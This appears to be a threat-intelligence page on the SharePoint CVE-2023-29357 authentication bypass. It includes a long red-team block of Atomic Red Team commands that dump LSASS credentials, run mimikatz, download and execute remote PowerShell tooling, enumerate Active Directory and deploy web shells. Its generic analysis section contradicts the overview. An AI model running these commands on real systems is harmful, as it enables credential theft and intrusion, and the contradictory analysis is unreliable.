CVE-2023-29357
Overview
This vulnerability is an authentication bypass in Microsoft SharePoint Server 2019 caused by improper validation of JSON Web Tokens (JWT) using the "none" algorithm. The root cause lies in the server accepting forged JWTs without verifying their signature, specifically in the API handling site user authentication. The affected component is the SharePoint REST API endpoint responsible for user and site access control.
Vulnerability Description
Microsoft SharePoint Server Elevation of Privilege Vulnerability
Impact
An attacker can bypass authentication without any valid credentials or user interaction, gaining elevated privileges within SharePoint Server 2019. This enables unauthorized access to sensitive documents, user information, and configuration data stored on the SharePoint site. The breach can lead to data exfiltration, unauthorized data modification, and potential lateral movement within an enterprise environment.
Solution
Microsoft has released a security update addressing this vulnerability for SharePoint Server 2019, detailed in their official advisory at https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357. Administrators should apply the latest patches as recommended by Microsoft to ensure JWT signature validation is enforced. No alternative workarounds are provided; patching is the primary mitigation step.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in Microsoft SharePoint Server represents a critical elevation of privilege issue that can be exploited by an attacker to gain unauthorized access to sensitive information and functionalities within the system. This flaw arises from improper handling of requests, allowing an attacker to execute arbitrary code with elevated privileges. The technical details indicate that the vulnerability stems from inadequate validation of user input, which could lead to unauthorized actions being performed on behalf of legitimate users. This lack of proper access controls can be particularly dangerous in environments where SharePoint is heavily integrated into business processes and data management.
Attack vectors for this vulnerability are varied, but they primarily involve authenticated users leveraging their access to execute malicious payloads. An attacker could craft a specially designed request that, when processed by the SharePoint server, bypasses standard security checks. This could occur through various means, such as phishing attacks that trick users into executing malicious scripts or through direct exploitation of the server's web interface. Once the attacker has successfully exploited the vulnerability, they could gain administrative privileges, allowing them to manipulate data, access confidential documents, or even disrupt services. The potential for lateral movement within the network further amplifies the risk, as compromised accounts could be used to target other systems.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on SharePoint for collaboration and document management. The business risks associated with an elevation of privilege vulnerability include data breaches, loss of intellectual property, and reputational damage. Organizations may face regulatory penalties if sensitive information is exposed due to inadequate security measures. Additionally, the operational disruption caused by a successful exploit could lead to significant downtime, affecting productivity and potentially resulting in financial losses. The high CVSS score indicates that this vulnerability poses a substantial threat, necessitating immediate attention from security teams.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regular security assessments, including vulnerability scanning and penetration testing, can help identify potential weaknesses in the SharePoint environment. Additionally, applying the latest security patches and updates from Microsoft is critical to closing known vulnerabilities. Organizations should also enforce strict access controls, ensuring that users have only the permissions necessary for their roles. Monitoring user activities and implementing anomaly detection can help identify suspicious behavior indicative of exploitation attempts. Training employees on security best practices, particularly regarding phishing and social engineering, can further reduce the risk of successful attacks.
In conclusion, the elevation of privilege vulnerability in Microsoft SharePoint Server poses a significant threat to organizations that utilize this platform for collaboration and data management. The potential for unauthorized access to sensitive information and the ability to manipulate system functionalities highlight the need for robust security measures. By understanding the technical aspects, attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to defend against potential exploitation. Proactive detection and mitigation strategies are essential in safeguarding critical business assets and maintaining the integrity of sensitive information.
CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting the Microsoft SharePoint Server Elevation of Privilege vulnerability (CVE-2023-29357). This uptick, while modest, indicates persistent adversary interest and ongoing reconnaissance or exploitation efforts. The presence of multiple publicly available proof-of-concept tools continues to lower the barrier for threat actors, potentially accelerating attack campaigns. Notably, ransomware groups such as BianLian and Black Basta remain linked to this vulnerability, underscoring its continued appeal as an initial access vector or privilege escalation mechanism within ransomware operations. Although the Exploit Prediction Scoring System (EPSS) score remains stable near its peak, the incremental rise in detection activity signals that defenders should maintain heightened vigilance. This evolving landscape reinforces the criticality of monitoring for exploitation indicators and adapting detection capabilities accordingly, as the threat level remains elevated due to active adversary engagement and ransomware group associations.
Update 2 — July 11, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-29357, accompanied by the emergence of new proof-of-concept tools that facilitate vulnerability verification and exploitation. This uptick in adversary activity, while not yet classified as rapidly increasing, signals a growing operational interest likely driven by the vulnerability’s proven utility in ransomware campaigns linked to groups such as BianLian and Black Basta. The slight elevation in the EPSS score, although marginal, corroborates this trend and underscores the vulnerability’s sustained attractiveness as an exploitation vector. For defenders, this evolving threat landscape necessitates enhanced monitoring of exploitation indicators and integration of the latest detection rules, as adversaries are actively refining their toolsets and tactics to leverage this critical SharePoint Server flaw. Consequently, the overall threat level should be considered elevated, reflecting both the increased exploitation attempts and the continued ransomware group associations.
Update 3 — July 20, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-29357, reflected by a substantial increase in detection activity across our telemetry. This surge coincides with the continued presence of multiple ransomware groups known to leverage this vulnerability, reinforcing its role as a preferred vector for privilege escalation in targeted campaigns. Although the EPSS score remains stable at a critically high level, the sharp rise in observed exploitation attempts signals adversaries are intensifying efforts to weaponize this flaw. For defenders, this evolving pattern underscores an elevated threat environment where timely detection and response are increasingly critical. The convergence of active ransomware exploitation and expanding proof-of-concept resources further amplifies the risk, warranting heightened vigilance despite the absence of new exploit techniques. Overall, the threat level associated with CVE-2023-29357 should be considered elevated due to the growing frequency and persistence of exploitation activity documented by our sensors.
Update 4 — August 04, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-29357, reflecting a significant intensification of adversary efforts to exploit this Microsoft SharePoint Server vulnerability. This surge coincides with the continued presence of ransomware groups such as BianLian and Black Basta, reinforcing the vulnerability’s role as a favored vector in ransomware campaigns. While the EPSS score remains near maximum and stable, the sharp increase in telemetry signals a growing operational tempo among threat actors, likely driven by the expanding availability of proof-of-concept tools and public exploit resources. For defenders, this development underscores an increasingly hostile environment where the window for effective detection and response is narrowing. The elevated exploitation frequency combined with active ransomware associations elevates the overall risk posture, indicating that CVE-2023-29357 remains a critical priority for monitoring and defensive measures.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Microsoft | Sharepoint Server | 2019 |
cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Sharepoint Dynamic Proxy Generator Unauth RCE
exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce
|
Jang, jheysel-r7 | Unknown | - | View |
GitHub PoCs (9)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Chocapikk/CVE-2023-29357
Microsoft SharePoint Server Elevation of Privilege Vulnerability
|
Chocapikk | 238 | 33 | 2023-09-26 | View |
|
LuemmelSec/CVE-2023-29357
|
LuemmelSec | 55 | 5 | 2023-09-30 | View |
|
Guillaume-Risch/cve-2023-29357-Sharepoint
|
Guillaume-Risch | 4 | 0 | 2023-12-22 | View |
|
KeyStrOke95/CVE-2023-29357-ExE
Recreation of the SharePoint PoC for CVE-2023-29357 in C# from LuemmelSec
|
KeyStrOke95 | 2 | 0 | 2023-10-10 | View |
|
Jev1337/CVE-2023-29357-Check
A Python script that verifies whether a target is vulnerable to CVE-2023-29357 or not
|
Jev1337 | 1 | 0 | 2024-01-01 | View |
|
PoC
|
- | 0 | 0 | - | View |
|
DonVorrin/CVE-2023-29357
|
DonVorrin | 0 | 0 | 2026-04-13 | View |
|
AhmedMansour93/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357
Event ID 189 Rule Name SOC227 Microsoft SharePoint Server Elevation of Privilege Possible CVE-2023-29357 .. Exploitati...
|
AhmedMansour93 | 0 | 0 | 2024-09-12 | View |
|
DeividasTerechovas/SOC227-Microsoft-SharePoint-Server-Elevation-of-Privilege-Possible-CVE-2023-29357-Exploitation
|
DeividasTerechovas | 0 | 0 | 2025-04-01 | View |
Threat Feed
55 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Acronis Disk Director, Angry IP Scanner, AnyDesk, Atera, BITSAdmin (842 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AmmyyAdmin, AnyDesk, Atera (552 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability. Tools: AdFind, AnyDesk, Atera, BITSAdmin, Backstab (Process Explorer driver) (523 known victims)
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-90 | Reflection Attack in Authentication Protocol |
30%
|
High | High |
Red Team Playbook
65 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-29357 |
| msrc.microsoft.com |
GitHub CVE
vendor-advisory
|
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-29357 |